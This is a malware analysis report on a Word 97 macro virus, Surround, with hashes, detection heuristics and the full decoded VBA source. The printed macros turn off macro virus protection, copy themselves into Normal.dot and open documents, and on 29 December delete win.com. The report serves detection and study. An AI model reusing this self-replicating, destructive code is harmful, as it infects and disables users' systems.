Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18d8da029d751c1d…

MALICIOUS

Office (OLE)

Size: 35.0 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: 978e4bcd8b976cdb9bbf1881ac46bdaa
SHA-1: a7628568b42e4b563606e5693b681795896c5085
SHA-256: 18d8da029d751c1df0cbf3454ab88a351e65b3965dad5fdeb121c497a34bf94b
Risk score: 200

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)

The document carries a VBA module named Surround whose entry points AutoOpen, AutoNew and AutoExec are WordBasic-era names that Word 97's VBA still runs without any user action. On open it sets Options.VirusProtection = False to switch off Word's macro virus warning, suppresses the prompt to save changes to Normal.dot, exports its own module to C:\Surround.key with the hidden and system attributes set, and imports that file into both the Normal template and the active document; that is how it spreads to every document edited afterwards. AutoExec carries a date-triggered payload: on 29 December it attempts to delete C:\WIN*\win.com, the Windows 9x loader, which would leave Windows unable to start, and then shows a system-modal message box reading "You are now Surrounded!!". An auto-executing macro that disables virus protection and copies itself into Normal.dot is the classic macro-virus pattern and is why the file is classified as malicious. Note that the self-copy relies on programmatic access to VBProject, which later Office versions block by default (the "Trust access to the VBA project object model" setting), so on a modern host the replication step fails even when macros are allowed to run; the payload in AutoExec does not depend on that access.

Heuristics (4)

  • ClamAV: Doc.Trojan.Surround-3 (severity: critical, rule CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Surround-3
  • VBA macros detected (severity: medium, rule OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, rule OLE_VBA_AUTOOPEN)
    The document contains an AutoOpen macro, which Word runs automatically when the file is opened
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the rule's generic wording is partly stale: a VBA project was in fact recovered (see the macros.bas artifact), so treat the finding as confirming the Auto* execution surface rather than as a statement about what was extracted.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1636 bytes
SHA-256: 07bc611791223755ca99cd1154ba15c284d35bb90e2929ec893fcf5ecd256da6
Detection: ClamAV: Doc.Trojan.Surround-3
Obfuscation or payload: unlikely

Extracted script (macros.bas). olevba emits the attribute stub of the ThisDocument module first, followed by the Surround module that holds the macro code:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Surround"
Sub AutoOpen()
    CreateKey
    DefaultOptions
    InsertInNormal
    InsertInActive
End Sub

Sub AutoNew()
    InsertInActive
End Sub

Sub DefaultOptions()
    Options.VirusProtection = False
    Options.BackgroundSave = True
    Options.SaveNormalPrompt = False
End Sub

Sub AutoExec()
    DefaultOptions
    If Month(Date) = 12 And Day(Date) = 29 Then
        Kill "C:\WIN*\win.com"
        e = MsgBox("You are now Surrounded!!", vbCritical + vbSystemModal, "Virus information", "", 0)
    End If
End Sub

Sub CreateKey()
    For Each component In ActiveDocument.VBProject.VBComponents
        If component.Name = "Surround" Then
            component.Export ("C:\Surround.key")
            SetAttr "C:\Surround.key", vbHidden + vbSystem
        End If
    Next component
End Sub

Sub InsertInNormal()
    For Each component In NormalTemplate.VBProject.VBComponents
        If component.Name = "Surround" Then Exit Sub
    Next component
    If Day(Date) = 21 Then
        Beep
    End If
    NormalTemplate.VBProject.VBComponents.Import ("C:\Surround.key")
End Sub

Sub InsertInActive()
    For Each component In ActiveDocument.VBProject.VBComponents
        If component.Name = "Surround" Then Exit Sub
    Next component
    ActiveDocument.VBProject.VBComponents.Import ("C:\Surround.key")
End Sub